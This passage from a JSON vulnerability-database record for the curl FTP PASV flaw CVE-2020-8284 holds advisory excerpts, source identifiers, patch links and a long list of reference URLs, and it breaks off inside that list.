Fix(es):\n\n* golang: crypto/tls: certificate of wrong type is causing TLS client to\npanic\n(CVE-2021-34558)\n* golang: net: lookup functions may return invalid host names\n(CVE-2021-33195)\n* golang: net/http/httputil: ReverseProxy forwards connection headers if\nfirst one is empty (CVE-2021-33197)\n* golang: match/big.Rat: may cause a panic or an unrecoverable fatal error\nif passed inputs with very large exponents (CVE-2021-33198)\n* golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a\ncustom TokenReader (CVE-2021-27918)\n* golang: net/http: panic in ReadRequest and ReadResponse when reading a\nvery large header (CVE-2021-31525)\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (CVE-2021-33196)\n\nIt was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196\nhave been incorrectly mentioned as fixed in RHSA for Serverless client kn\n1.16.0. This has been fixed (CVE-2021-3703). Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1983651 - Release of OpenShift Serverless Serving 1.17.0\n1983654 - Release of OpenShift Serverless Eventing 1.17.0\n1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names\n1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty\n1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents\n1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196\n\n5",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8284"
      },
      {
        "db": "VULHUB",
        "id": "VHN-186409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8284"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "160436"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-8284",
        "trust": 2.0
      },
      {
        "db": "SIEMENS",
        "id": "SSA-389290",
        "trust": 1.1
      },
      {
        "db": "HACKERONE",
        "id": "1040166",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160436",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163197",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163267",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163276",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163193",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "160706",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163257",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163496",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160423",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162629",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-186409",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8284",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169015",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162877",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164192",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8284"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "160436"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8284"
      }
    ]
  },
  "id": "VAR-202012-1277",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186409"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-03-09T21:22:59.757000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Debian CVElist Bug Report Logs: curl: CVE-2020-8284: trusting FTP PASV responses",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=0ffb05dc08c6c9f5251a5fb47d2c1b45"
      },
      {
        "title": "IBM: Security Bulletin: IBM MQ is affected by a vulnerability within libcurl (CVE-2020-8284)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8dce374d73a7e6e542a5aecc279d3c25"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2020-8284 log"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1693",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1693"
      },
      {
        "title": "Debian Security Advisories: DSA-4881-1 curl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a9706a30f62799ecc4d45bdb53c244eb"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=4a9822530e6b610875f83ffc10e02aba"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "evilFTP",
        "trust": 0.1,
        "url": "https://github.com/vp777/evilFTP "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/Live-Hack-CVE/CVE-2021-40491 "
      },
      {
        "title": "surferFTP",
        "trust": 0.1,
        "url": "https://github.com/vp777/surferFTP "
      },
      {
        "title": "clair-client",
        "trust": 0.1,
        "url": "https://github.com/indece-official/clair-client "
      },
      {
        "title": "PIA-PC",
        "trust": 0.1,
        "url": "https://github.com/zanezhub/PIA-PC "
      },
      {
        "title": "myapp-container-jaxrs",
        "trust": 0.1,
        "url": "https://github.com/akiraabe/myapp-container-jaxrs "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-8284"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.1
      },
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186409"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8284"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20210122-0007/"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht212325"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht212326"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht212327"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2021/dsa-4881"
      },
      {
        "trust": 1.1,
        "url": "https://security.gentoo.org/glsa/202012-14"
      },
      {
        "trust": 1.1,
        "url": "https://curl.se/docs/cve-2020-8284.html"
      },
      {
        "trust": 1.1,
        "url": "https://hackerone.com/reports/1040166"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00029.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nzuvsqhn2eshmjxnq2z7t2eelbb5hjxg/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/daehe2s2qlo4ao4meeyl75nb7sah5psl/"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-25013"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29361"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-2708"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-28196"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-15358"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-8927"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29362"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-9169"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29363"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-13434"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2016-10228"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-8231"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3326"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-27618"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8169"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22890"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29362"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-20305"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-23336"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20305"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-14502"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27618"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8927"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29363"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-27619"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24977"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-3842"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-13776"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3449"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3450"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29361"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28196"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22901"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22890"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31618"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31618"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8169"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26116"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28362"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/jaeger/jaeger_install/rhb"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23336"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27219"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27619"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24977"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/daehe2s2qlo4ao4meeyl75nb7sah5psl/"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/nzuvsqhn2eshmjxnq2z7t2eelbb5hjxg/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/curl"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=securitypatches\u0026version=2.4.37"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.openssl\u0026downloadtype=securitypatches\u0026version=1.1.1g"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.37/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2471"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2472"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27219"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2532"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13949"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13949"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14347"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36322"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15586"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12114"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9951"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25704"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36242"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19528"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9948"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28935"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0431"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16845"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13584"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18811"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14360"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21645"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27783"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19528"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14314"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14356"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21643"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27786"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25215"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25643"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9983"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24331"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24394"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0431"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-0342"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18811"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-30465"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14345"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14344"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21644"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14361"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25285"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35508"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28974"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24332"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15437"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25284"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11608"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2122"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11608"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21642"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12464"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4665-1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4665-2"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3537"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27918"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33196"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33195"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27918"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3520"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33196"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33197"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33198"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33198"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-31525"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-34558"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3556"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3326"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3516"
      },
      {
        "trust": 0.1,
